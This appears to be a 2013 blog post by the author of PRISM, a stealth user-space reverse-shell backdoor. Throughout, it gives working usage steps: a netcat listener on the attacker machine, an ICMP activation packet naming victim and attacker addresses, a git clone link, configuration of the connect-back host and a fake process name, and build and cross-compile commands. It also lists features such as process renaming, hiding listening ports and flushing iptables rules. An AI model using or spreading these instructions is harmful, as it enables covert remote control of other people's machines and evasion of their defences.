PRISM backdoor

An user space stealth reverse shell backdoor.

Posted by Andrea Fabrizi on April 18, 2013

Prism backdoor

PRISM is an user space stealth reverse shell backdoor. The code is available on GitHub.

It has been fully tested on:

  • Linux
  • Solaris
  • AIX
  • BSD/Mac
  • Android

PRISM can works in two different ways: ICMP and STATIC mode.

ICMP mode

Using this operation mode the backdoor waits silently in background for a specific ICMP packet containing the host/port to connect back and a private key to prevent third party access.

  • First, run netcat on the attacker machine to wait for incoming connection from the backdoor: 
    $ nc -l -p 6666
  • Using the sendPacket.py script (or another packet builder) send the activation packet to the backdoor: 
    ./sendPacket.py 192.168.0.1 p4ssw0rd 192.168.0.10 6666

    192.168.0.1 is the victim machine running prism backdoor
    p4ssw0rd is the key
    192.168.0.10 is the attacker machine address
    6666 is the attacker machine port

  • The backdoor will connect back to netcat!

STATIC mode

Using this operation mode the backdoor try to connects to an hard-coded IP/PORT.
In this case, just run netcat listening on the hard-coded machine/port:

 $ nc -l -p [PORT]

Features

  • Two operating modes (ICMP and STATIC)
  • Runtime process renaming
  • No listening ports
  • Automatic iptables rules flushing
  • Written in pure C
  • No library dependencies

Get the code

git clone https://github.com/andreafabrizi/prism.git

Configuration

Before building, you have to configure the backdoor editing the source code.
Following the configuration parameters description:

STATIC mode:
REVERSE_HOST: Machine address to connect back
REVERSE_PORT: Machine port to connect back
RESPAWN_DELAY: Time, in seconds, between each connection

ICMP mode:
ICMP_KEY: Key/Password to activate the backdoor

Generic parameters:
MOTD: Message to be printed at the backdoor connection
SHELL: Shell to execute
PROCESS_NAME: Fake process name

Building

gcc <..OPTIONS..> -Wall -s -o prism prism.c

Available GCC options:
-DDETACH #Run the process in background
-DSTATIC #Enable STATIC mode (default is the ICMP mode)
-DNORENAME #Doesn’t renames the process
-DIPTABLES #Try to flush all iptables rules

Example:
gcc -DDETACH -DNORENAME -Wall -s -o prism prism.c

Cross Compiling

  • Android
    Change the shell to /system/bin/sh
    apt-get install gcc-arm-linux-gnueabi
    arm-linux-gnueabi-gcc -DSTATIC -DDETACH -DNORENAME -static -march=armv5 prism.c -o prism

  • Linux 64bit (using a 32bit host system)
    apt-get install libc6-dev-amd64
    gcc -DDETACH -m64 -Wall -s -o prism prism.c

  • Linux 32bit (using a 64bit host system)
    apt-get install libc6-dev-i386
    gcc -DDETACH -m32 -Wall -s -o prism prism.c

Backdoor building information

The backdoor ignore any command line parameter, except the Inf0 (the last char is a digit).
This option allow you to see some information about the backdoor:

$ ./prism Inf0
 Version: 0.5
 Mode: icmp
 Key: p455w0rD
 Process name: [udevd]
 Shell: /bin/sh
 Detach: Yes
 Flush Iptables: No